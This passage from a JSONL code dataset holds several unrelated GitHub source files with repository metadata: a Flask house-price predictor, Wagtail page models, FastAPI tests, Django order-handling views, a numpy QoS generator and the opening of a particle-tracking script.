150:\n Year = 'AGE OF BUILDING_8'\n else:\n Year = 'AGE OF BUILDING_9'\n\n df = pd.read_csv(r'cleaned_data.csv')\n\n # divides the data set into X (data) and Y (desired predicted value)\n X = df.drop(columns=['SALE PRICE'])\n Y = df['SALE PRICE']\n\n def predict_price(Residential_Units, Commercial_Units, Gross_sqft, Zip_Code, Class_Category, Year_Built):\n Zip_Code_index= np.where(X.columns==Zip_Code)[0][0] # finds column with the title given in the neighborhood box\n Class_Category_index= np.where(X.columns==Class_Category)[0][0]\n year_index= np.where(X.columns==Year_Built)[0][0]\n\n x=np.zeros(len(X.columns)) #sets all columns in a data set object x to zero\n x[0]= Residential_Units #changes a specified column from zero to the value assigned to the variable (retreived from the post request)\n x[1]= Commercial_Units\n x[2]= Gross_sqft\n if Zip_Code_index >= 0:\n x[Zip_Code_index] = 1 # assigns a one to the desired neighborhood (one hot encoding)\n if Class_Category_index >= 0:\n x[Class_Category_index] = 1\n if year_index >= 0:\n x[year_index] = 1\n\n #return model.predict([x])[0]\n test1 = np.array([x])[0] #the x data set object is passed through the ml model\n return model.predict(test1.reshape(1, 88), batch_size=1)\n\n prediction = predict_price(ResU,ComU,Gsqft,Zip,Class_C,Year) # set up this way to avoid confusion between global and local variables\n return render_template('index.html', prediction_text='Price should be {}'.format(prediction)) # prediction sent to index.html template file\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n", "repo_name": "Ncalo19/Queens_price_predictor", "sub_path": "Queens_apartment_flask.py", "file_name": "Queens_apartment_flask.py", "file_ext": "py", "file_size_in_byte": 3120, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 27, 
"usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "19071803062", "text": "from django.db import models\n\nfrom modelcluster.fields import ParentalKey\nfrom modelcluster.contrib.taggit import ClusterTaggableManager\nfrom taggit.models import TaggedItemBase\n\nfrom wagtail.core.models import Page\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.admin.edit_handlers import FieldPanel, MultiFieldPanel\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.documents.models import Document\nfrom wagtail.documents.edit_handlers import DocumentChooserPanel\nfrom wagtail.search import index\n\n\nclass ReportIndexPage(Page):\n intro = RichTextField(blank=True)\n\n def get_context(self, request):\n # Update context to include only published posts, ordered by reverse-chron\n context = super().get_context(request)\n reportpages = self.get_children().live().order_by('-first_published_at')\n context['reportpages'] = reportpages\n return context\n\nclass ReportPageTag(TaggedItemBase):\n content_object = ParentalKey(\n 'ReportPage',\n related_name='tagged_items',\n on_delete=models.CASCADE\n )\n\nclass ReportPage(Page):\n date = models.DateField(\"Post date\")\n report_document = models.ForeignKey(\n 'wagtaildocs.Document',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n indicator_number = models.CharField(max_length=250)\n indicator_caption = models.CharField(max_length=250)\n body = RichTextField(blank=True)\n tags = ClusterTaggableManager(through=ReportPageTag, blank=True)\n\n search_fields = Page.search_fields + [\n index.SearchField('indicator_caption'),\n index.SearchField('body'),\n ]\n\n content_panels = Page.content_panels + [\n MultiFieldPanel([\n FieldPanel('date'),\n FieldPanel('tags'),\n ], heading=\"Report Metadata\"),\n DocumentChooserPanel('report_document'),\n FieldPanel('indicator_number'),\n FieldPanel('indicator_caption'),\n FieldPanel('body'),\n ]\n\nclass ReportTagIndexPage(Page):\n\n def get_context(self, request):\n\n # Filter by tag\n tag = request.GET.get('tag')\n reportpages = ReportPage.objects.filter(tags__name=tag)\n\n # Update template context\n context = super().get_context(request)\n context['reportpages'] = reportpages\n return context\n", "repo_name": "NiJeLorg/UNITEPinellas", "sub_path": "website/reports/models.py", "file_name": "models.py", 
"file_ext": "py", "file_size_in_byte": 2369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "wagtail.core.models.Page", "line_number": 16, "usage_type": "name"}, {"api_name": "wagtail.core.fields.RichTextField", "line_number": 17, "usage_type": "call"}, {"api_name": "taggit.models.TaggedItemBase", "line_number": 26, "usage_type": "name"}, {"api_name": "modelcluster.fields.ParentalKey", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models.CASCADE", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 42, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "wagtail.core.fields.RichTextField", "line_number": 44, "usage_type": "call"}, {"api_name": "modelcluster.contrib.taggit.ClusterTaggableManager", "line_number": 45, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page.search_fields", "line_number": 47, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 47, "usage_type": "name"}, {"api_name": "wagtail.search.index.SearchField", "line_number": 48, "usage_type": "call"}, {"api_name": "wagtail.search.index", "line_number": 48, "usage_type": "name"}, {"api_name": "wagtail.search.index.SearchField", "line_number": 49, "usage_type": "call"}, {"api_name": "wagtail.search.index", "line_number": 49, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page.content_panels", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 52, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.MultiFieldPanel", "line_number": 53, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 54, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 55, "usage_type": "call"}, {"api_name": "wagtail.documents.edit_handlers.DocumentChooserPanel", "line_number": 57, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 58, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 59, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 60, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page", "line_number": 63, "usage_type": "name"}]} +{"seq_id": "18808548908", "text": "\"\"\"\nModule for test API endpoints\n\"\"\"\n\nfrom fastapi.testclient import TestClient\n\nfrom application.app import app, health_message, root_endpoint_message\n\nclient = TestClient(app)\n\n\nclass TestFastAPIApp:\n \"\"\"\n Class define tests for 
testing FastAPI application\n    \"\"\"\n\n    def test_read_main(self):\n        \"\"\"Tests access to the root endpoint\"\"\"\n        response = client.get(\"/\")\n        assert response.status_code == 200\n        assert response.json() == root_endpoint_message\n\n    def test_read_health(self):\n        \"\"\"Tests access to the healthcheck endpoint\"\"\"\n        response = client.get(\"health\")\n        assert response.status_code == 200\n        assert response.json() == health_message\n", "repo_name": "maciuozz/test-app-argocd-src", "sub_path": "src/tests/app_test.py", "file_name": "app_test.py", "file_ext": "py", "file_size_in_byte": 706, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.testclient.TestClient", "line_number": 9, "usage_type": "call"}, {"api_name": "application.app.app", "line_number": 9, "usage_type": "argument"}, {"api_name": "application.app.root_endpoint_message", "line_number": 21, "usage_type": "name"}, {"api_name": "application.app.health_message", "line_number": 27, "usage_type": "name"}]}
+{"seq_id": "29183908496", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom utils.contrib import build_json\nfrom utils.contrib import order_state\nfrom partner.models import Orders\nfrom partner.models import Partner\nfrom partner.models import Product\nfrom userextends.models import UserExtends\nfrom weixin import wxapi\nfrom utils import contrib\nimport datetime\nimport time\nimport json\nimport uuid\n\n# Create your views here.\ndef cancel_order(request):\n    if oprate_order(request, u'已撤销'):\n        return HttpResponse(build_json(None));\n    return HttpResponse(build_json(None, 1, '当前状态不允许再改变'));\n\ndef accept_order(request):\n    if oprate_order(request, u'已确认'):\n        return HttpResponse(build_json(None));\n    return HttpResponse(build_json(None, 1, '当前状态不允许再改变'));\n\ndef dismiss_order(request):\n    if oprate_order(request, u'已拒绝'):\n        return HttpResponse(build_json(None));\n    return HttpResponse(build_json(None, 1, '当前状态不允许再改变'));\n\ndef oprate_order(request, oprate):\n    states = order_state()\n    if 'id' in request.POST:\n        order = Orders.objects.get(id=request.POST['id'])\n        if order.change_state(oprate) is True:\n            userextends = UserExtends.objects.get(user=order.user)\n            access_token = wxapi.wx_access_token()\n            wxapi.send_wxmsg(\n                access_token,\n                userextends.openid, order, u\"你的订单状态有变化!\", u\"祝用餐愉快!\", \"http://sc.kangyanping.com/wx/order?id=\" + str(order.id))\n            return True\n    return False\n\ndef create_order(request):\n    now = datetime.datetime.now()\n    if not request.user.is_authenticated:\n        return HttpResponse(build_json(None, 1, 'not login'));\n\n    userextends = UserExtends.objects.get(user=request.user)\n    if not userextends:\n        return HttpResponse(build_json(None, 1, 'not login'));\n\n    data = json.loads(request.body)\n    note = ''\n    booktime = ''\n    bookdate = now.strftime('%Y-%m-%d ')\n    menu_products = []\n    pid = ''\n    needroom = ''\n    vcode = ''\n    phone = ''\n    if 'note' in data:\n        note = data['note']\n    if 'booktime' in data:\n        booktime = data['booktime']\n    if 'ids' in data:\n        menu_products = data['ids']\n    if 'pid' in data:\n        pid = data['pid']\n    if 'needroom' in data:\n        needroom = data['needroom']\n    if 'vcode' in data:\n        vcode = data['vcode']\n    if 'phone' in data:\n        phone = data['phone']\n    if 'bookdate' in data:\n        bookdate = data['bookdate']\n\n    # If no phone number is on file yet, the verification code must be checked\n    if not userextends.phone:\n        if not 
contrib.verify_code(phone, vcode):\n return HttpResponse(build_json(None, 1, '验证码错误'))\n userextends.phone = phone\n #如果手机号有变化需要校验验证码\n if userextends.phone != phone:\n if not contrib.verify_code(phone, vcode):\n return HttpResponse(build_json(None, 1, '验证码错误'))\n userextends.phone = phone\n\n product_ids = []\n for p in menu_products:\n product_ids.append(p['id'])\n\n products = Product.objects.filter(id__in = product_ids).filter(partner_id=pid)\n price = 0.0\n count = 0\n for product in products:\n for p in menu_products:\n if p['id'] == product.id:\n price += p['num'] * p['price']\n count += p['num']\n\n partner = Partner.objects.get(id=pid)\n order = Orders()\n order.user = request.user\n order.partner = partner\n order.set_products(menu_products)\n order.price = price\n order.create_on = now.strftime('%Y-%m-%d %H:%M:%S')\n order.create_by = request.user.username\n order.modify_on = now.strftime('%Y-%m-%d %H:%M:%S')\n order.modify_by = request.user.username\n order.effected_on = bookdate + \" \" + booktime + now.strftime(':%S')\n effected_on = time.mktime(time.strptime(order.effected_on, \"%Y-%m-%d %H:%M:%S\"))\n if effected_on - time.time() < (30 * 60):\n return HttpResponse(build_json(None, 2, '必须提前30分钟预定'))\n order.guid = uuid.uuid1()\n order.set_needroom(needroom)\n order.set_note(note)\n order.save()\n\n userextends.set_collect(partner.id)\n userextends.save()\n\n userextends = UserExtends.objects.get(user=partner.username)\n access_token = wxapi.wx_access_token()\n wxapi.send_wxmsg(\n access_token,\n userextends.openid, order, u\"你收到了新的订单!\", u\"请及时处理!\", \"http://sc.kangyanping.com/wx/partner/order?id=\"+str(order.id))\n return HttpResponse(build_json({ 'id': order.id}))\n", "repo_name": "fishingmaner/testmycode", "sub_path": "partner/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4729, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.http.HttpResponse", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 23, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 24, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 28, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 29, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 29, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 33, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 33, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 34, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 34, "usage_type": "call"}, {"api_name": "utils.contrib.order_state", "line_number": 37, "usage_type": "call"}, {"api_name": "partner.models.Orders.objects.get", "line_number": 39, "usage_type": "call"}, {"api_name": "partner.models.Orders.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "partner.models.Orders", "line_number": 39, "usage_type": "name"}, {"api_name": "userextends.models", "line_number": 41, "usage_type": "name"}, {"api_name": "userextends.models.UserExtends.objects.get", "line_number": 41, "usage_type": "call"}, {"api_name": "userextends.models.UserExtends.objects", 
"line_number": 41, "usage_type": "attribute"}, {"api_name": "userextends.models.UserExtends", "line_number": 41, "usage_type": "name"}, {"api_name": "weixin.wxapi.wx_access_token", "line_number": 42, "usage_type": "call"}, {"api_name": "weixin.wxapi", "line_number": 42, "usage_type": "name"}, {"api_name": "weixin.wxapi.send_wxmsg", "line_number": 43, "usage_type": "call"}, {"api_name": "weixin.wxapi", "line_number": 43, "usage_type": "name"}, {"api_name": "userextends.models.openid", "line_number": 45, "usage_type": "attribute"}, {"api_name": "userextends.models", "line_number": 45, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 50, "usage_type": "attribute"}, {"api_name": "django.http.HttpResponse", "line_number": 52, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 52, "usage_type": "call"}, {"api_name": "userextends.models", "line_number": 54, "usage_type": "name"}, {"api_name": "userextends.models.UserExtends.objects.get", "line_number": 54, "usage_type": "call"}, {"api_name": "userextends.models.UserExtends.objects", "line_number": 54, "usage_type": "attribute"}, {"api_name": "userextends.models.UserExtends", "line_number": 54, "usage_type": "name"}, {"api_name": "userextends.models", "line_number": 55, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 56, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 58, "usage_type": "call"}, {"api_name": "userextends.models.phone", "line_number": 85, "usage_type": "attribute"}, {"api_name": "userextends.models", "line_number": 85, "usage_type": "name"}, {"api_name": "utils.contrib.verify_code", "line_number": 86, "usage_type": "call"}, {"api_name": "utils.contrib", "line_number": 86, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 87, "usage_type": "call"}, {"api_name": "userextends.models.phone", "line_number": 88, "usage_type": "attribute"}, {"api_name": "userextends.models", "line_number": 88, "usage_type": "name"}, {"api_name": "userextends.models.phone", "line_number": 90, "usage_type": "attribute"}, {"api_name": "userextends.models", "line_number": 90, "usage_type": "name"}, {"api_name": "utils.contrib.verify_code", "line_number": 91, "usage_type": "call"}, {"api_name": "utils.contrib", "line_number": 91, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 92, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 92, "usage_type": "call"}, {"api_name": "userextends.models.phone", "line_number": 93, "usage_type": "attribute"}, {"api_name": "userextends.models", "line_number": 93, "usage_type": "name"}, {"api_name": "partner.models.Product.objects.filter", "line_number": 99, "usage_type": "call"}, {"api_name": "partner.models.Product.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "partner.models.Product", "line_number": 99, "usage_type": "name"}, {"api_name": "partner.models", "line_number": 108, "usage_type": "name"}, {"api_name": "partner.models.Partner.objects.get", "line_number": 108, "usage_type": "call"}, {"api_name": "partner.models.Partner.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "partner.models.Partner", "line_number": 108, "usage_type": "name"}, {"api_name": 
"partner.models.Orders", "line_number": 109, "usage_type": "call"}, {"api_name": "partner.models", "line_number": 111, "usage_type": "name"}, {"api_name": "time.mktime", "line_number": 119, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 119, "usage_type": "call"}, {"api_name": "time.time", "line_number": 120, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 121, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 121, "usage_type": "call"}, {"api_name": "uuid.uuid1", "line_number": 122, "usage_type": "call"}, {"api_name": "userextends.models.set_collect", "line_number": 127, "usage_type": "call"}, {"api_name": "userextends.models", "line_number": 127, "usage_type": "name"}, {"api_name": "partner.models.id", "line_number": 127, "usage_type": "attribute"}, {"api_name": "partner.models", "line_number": 127, "usage_type": "name"}, {"api_name": "userextends.models.save", "line_number": 128, "usage_type": "call"}, {"api_name": "userextends.models", "line_number": 128, "usage_type": "name"}, {"api_name": "userextends.models", "line_number": 130, "usage_type": "name"}, {"api_name": "userextends.models.UserExtends.objects.get", "line_number": 130, "usage_type": "call"}, {"api_name": "userextends.models.UserExtends.objects", "line_number": 130, "usage_type": "attribute"}, {"api_name": "userextends.models.UserExtends", "line_number": 130, "usage_type": "name"}, {"api_name": "partner.models.username", "line_number": 130, "usage_type": "attribute"}, {"api_name": "partner.models", "line_number": 130, "usage_type": "name"}, {"api_name": "weixin.wxapi.wx_access_token", "line_number": 131, "usage_type": "call"}, {"api_name": "weixin.wxapi", "line_number": 131, "usage_type": "name"}, {"api_name": "weixin.wxapi.send_wxmsg", "line_number": 132, "usage_type": "call"}, {"api_name": "weixin.wxapi", "line_number": 132, "usage_type": "name"}, {"api_name": "userextends.models.openid", "line_number": 134, "usage_type": "attribute"}, {"api_name": "userextends.models", "line_number": 134, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 135, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "42808516391", "text": "import numpy as np\nimport os\nimport argparse\n\nassert os.getcwd().endswith('source_code'), '请将工作路径设为source_code,否则无法将结果存入正确路径'\n\nfrom env_configs.roadmap_env.roadmap_utils import Roadmap\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dyna_level', type=str, default='')\nargs = parser.parse_args()\n\ndef gen(POI_NUM, T):\n '''目前episode_steps硬编码为120,poi数量硬编码为NCSU'''\n # 分为三部分,一部分逐渐400 -> 200且权重增加,一部分逐渐200 -> 400且权重降低,另一部分固定300不变,权重不变\n # 预期结果:无人机前期重点关注第二类,后期重点关注第一类\n # if args.dyna_level == '1':\n # case1 = np.linspace(400, 200, T)\n # case2 = np.linspace(200, 400, T)\n # case3 = np.ones((T,)) * 300\n # elif args.dyna_level == '2':\n # case1 = np.linspace(300, 100, T)\n # case2 = np.linspace(100, 300, T)\n # case3 = np.ones((T,)) * 200\n # elif args.dyna_level == '3':\n # case1 = np.linspace(200, 100, T)\n # case2 = np.linspace(100, 200, T)\n # case3 = np.ones((T,)) * 150\n # elif args.dyna_level == '4':\n # case1 = np.linspace(300, 100, T)\n # case2 = np.linspace(100, 300, T)\n # case3 = np.ones((T,)) * 100\n raise NotImplementedError\n\n poi_QoS = np.vstack(\n [np.tile(case1, (10, 1)), np.tile(case2, (10, 1)), np.tile(case3, (13, 1))]\n ) # shape = (POI_NUM, T)\n assert poi_QoS.shape == (POI_NUM, T)\n return 
poi_QoS\n\n\ndef gen_according_to_cluster(POI_NUM, T):\n rm = Roadmap(dataset='NCSU', poi_num=POI_NUM)\n poi_mat = rm.init_pois(max_episode_step=T)\n\n # 根据user的初始位置划分case,具体划分规则参见草稿纸\n init_poses = poi_mat[:,0,:]\n case1 = np.linspace(300, 100, T)\n case2 = np.linspace(100, 300, T)\n case3 = np.ones((T,)) * 100\n poi_QoS = []\n count1, count2, count3 = 0, 0, 0\n for id, pos in enumerate(init_poses):\n if pos[0] < rm.max_dis_x/2:\n poi_QoS.append(case1)\n count1 += 1\n elif pos[1] < rm.max_dis_y/2:\n poi_QoS.append(case2)\n count2 += 1\n else:\n poi_QoS.append(case3)\n count3 += 1\n print(count1, count2, count3)\n poi_QoS = np.vstack(poi_QoS)\n assert poi_QoS.shape == (POI_NUM, T)\n return poi_QoS\n\n\ndef gen_spatial_temporal_SNRth(POI_NUM, T):\n # 右下角(case1)从100涨到500,其他地方(case2)从500降到100\n # 预期结果:任务前半部分主要去外面采,任务后半部分主要在右下角采\n case1 = np.linspace(500, 100, T)\n case2 = np.linspace(100, 500, T)\n\n rm = Roadmap(dataset='NCSU', poi_num=POI_NUM)\n poi_mat = rm.init_pois(max_episode_step=T) # shape = (33, 121, 2)\n assert poi_mat.shape == (POI_NUM, T+1, 2)\n\n poi_QoS = np.zeros((POI_NUM, T))\n count1, count2 = 0, 0\n for poi_id in range(POI_NUM):\n for t in range(T):\n pos = poi_mat[poi_id][t]\n if rm.max_dis_x / 2 < pos[0] < rm.max_dis_x and rm.max_dis_y / 2 < pos[1] < rm.max_dis_y:\n count1 += 1\n poi_QoS[poi_id][t] = case1[t]\n else:\n count2 += 1\n poi_QoS[poi_id][t] = case2[t]\n\n print(count1, count2)\n return poi_QoS\n\nPOI_NUM = 33\nT = 120\n# 将结果存入外存\nsave_dir = f'envs/NCSU/QoS{T}/poi_QoS{args.dyna_level}.npy'\n\nif args.dyna_level in (1, 2, 3, 4):\n result = gen(POI_NUM, T)\nelif args.dyna_level == 'cluster':\n result = gen_according_to_cluster(POI_NUM, T)\nelif args.dyna_level == 'SSTSS': # Same Space Time Same SNRth\n result = gen_spatial_temporal_SNRth(POI_NUM, T)\nelse:\n raise NotImplementedError\nnp.save(save_dir, result)\n#\n# ans = np.load(save_dir)\n# print(ans.shape)\n# print(ans.mean())\n# print(ans.var())\n", "repo_name": "Insomnia-y/DRL_dyna_AoI", "sub_path": "source_code/tools/pre/gen_poi_QoS.py", "file_name": "gen_poi_QoS.py", "file_ext": "py", "file_size_in_byte": 3852, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.getcwd", "line_number": 5, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 36, "usage_type": "call"}, {"api_name": "env_configs.roadmap_env.roadmap_utils.Roadmap", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 73, "usage_type": "call"}, {"api_name": "env_configs.roadmap_env.roadmap_utils.Roadmap", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 107, "usage_type": "call"}]} +{"seq_id": "40484824393", "text": "#This script connects hits in the data to produce tracks\n#Tracking Module of the ANNDEA package\n#Made by Filips Fedotovs\n\n######################################## Import libraries 
#############################################\nimport csv\nimport ast\ncsv_reader=open('../config',\"r\")\nconfig = list(csv.reader(csv_reader))\nfor c in config:\n if c[0]=='AFS_DIR':\n AFS_DIR=c[1]\n if c[0]=='EOS_DIR':\n EOS_DIR=c[1]\n if c[0]=='PY_DIR':\n PY_DIR=c[1]\ncsv_reader.close()\nimport sys\nif PY_DIR!='': #Temp solution - the decision was made to move all libraries to EOS drive as AFS get locked during heavy HTCondor submission loads\n sys.path=['',PY_DIR]\n sys.path.append('/usr/lib64/python36.zip')\n sys.path.append('/usr/lib64/python3.6')\n sys.path.append('/usr/lib64/python3.6/lib-dynload')\n sys.path.append('/usr/lib64/python3.6/site-packages')\n sys.path.append('/usr/lib/python3.6/site-packages')\nsys.path.append(AFS_DIR+'/Code/Utilities')\nimport pandas as pd #We use Panda for a routine data processing\npd.options.mode.chained_assignment = None #Silence annoying warnings\nimport math #We use it for data manipulation\nimport numpy as np\nimport os\nimport time\nfrom alive_progress import alive_bar\nimport argparse\nclass bcolors: #We use it for the interface\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nprint(' ')\nprint(' ')\nprint(bcolors.HEADER+\"########################################################################################################\"+bcolors.ENDC)\nprint(bcolors.HEADER+\"###################### Initialising ANNDEA Hit Tracking module #####################\"+bcolors.ENDC)\nprint(bcolors.HEADER+\"######################### Written by Filips Fedotovs #########################\"+bcolors.ENDC)\nprint(bcolors.HEADER+\"######################### PhD Student at UCL #########################\"+bcolors.ENDC)\nprint(bcolors.HEADER+\"########################################################################################################\"+bcolors.ENDC)\n#Setting the parser - this script is usually not run directly, but is used by a Master version Counterpart that passes the required arguments\nparser = argparse.ArgumentParser(description='This script prepares training data for training the tracking model')\nparser.add_argument('--Mode', help='Script will continue from the last checkpoint, unless you want to start from the scratch, then type \"Reset\"',default='')\nparser.add_argument('--ModelName',help=\"WHat GNN model would you like to use?\", default='MH_SND_Tracking_5_80_5_80')\nparser.add_argument('--Patience',help=\"How many checks to do before resubmitting the job?\", default='30')\nparser.add_argument('--SubPause',help=\"How long to wait in minutes after submitting 10000 jobs?\", default='60')\nparser.add_argument('--SubGap',help=\"How long to wait in minutes after submitting 10000 jobs?\", default='10000')\nparser.add_argument('--RecBatchID',help=\"Give this reconstruction batch an ID\", default='Test_Batch')\nparser.add_argument('--LocalSub',help=\"Local submission?\", default='N')\nparser.add_argument('--TrackFitCut',help=\"Track Fit cut Residual\", default=\"['1000','10','200']\")\nparser.add_argument('--ForceStatus',help=\"Would you like the program run from specific status number? (Only for advance users)\", default='0')\nparser.add_argument('--RequestExtCPU',help=\"Would you like to request extra CPUs?\", default=1)\nparser.add_argument('--JobFlavour',help=\"Specifying the length of the HTCondor job walltime. 
Currently at 'workday' which is 8 hours.\", default='workday')\nparser.add_argument('--f',help=\"Please enter the full path to the file with track reconstruction\", default='/eos/experiment/ship/ANNDEA/Data/SND_Emulsion_FEDRA_Raw_B31.csv')\nparser.add_argument('--Xmin',help=\"This option restricts data to only those events that have tracks with hits x-coordinates that are above this value\", default='0')\nparser.add_argument('--Xmax',help=\"This option restricts data to only those events that have tracks with hits x-coordinates that are below this value\", default='0')\nparser.add_argument('--Ymin',help=\"This option restricts data to only those events that have tracks with hits y-coordinates that are above this value\", default='0')\nparser.add_argument('--Ymax',help=\"This option restricts data to only those events that have tracks with hits y-coordinates that are below this value\", default='0')\nparser.add_argument('--Z_overlap',help=\"Enter the level of overlap in integer number between reconstruction blocks along z-axis. (In order to avoid segmentation this value should be more than 1)\", default='3')\nparser.add_argument('--Y_overlap',help=\"Enter the level of overlap in integer number between reconstruction blocks along y-axis. (In order to avoid segmentation this value should be more than 1)\", default='2')\nparser.add_argument('--X_overlap',help=\"Enter the level of overlap in integer number between reconstruction blocks along x-axis. (In order to avoid segmentation this value should be more than 1)\", default='2')\nparser.add_argument('--CheckPoint',help=\"Save cluster sets during individual cluster tracking.\", default='N')\nparser.add_argument('--ReqMemory',help=\"How much memory?\", default='2 GB')\n\n######################################## Parsing argument values #############################################################\nargs = 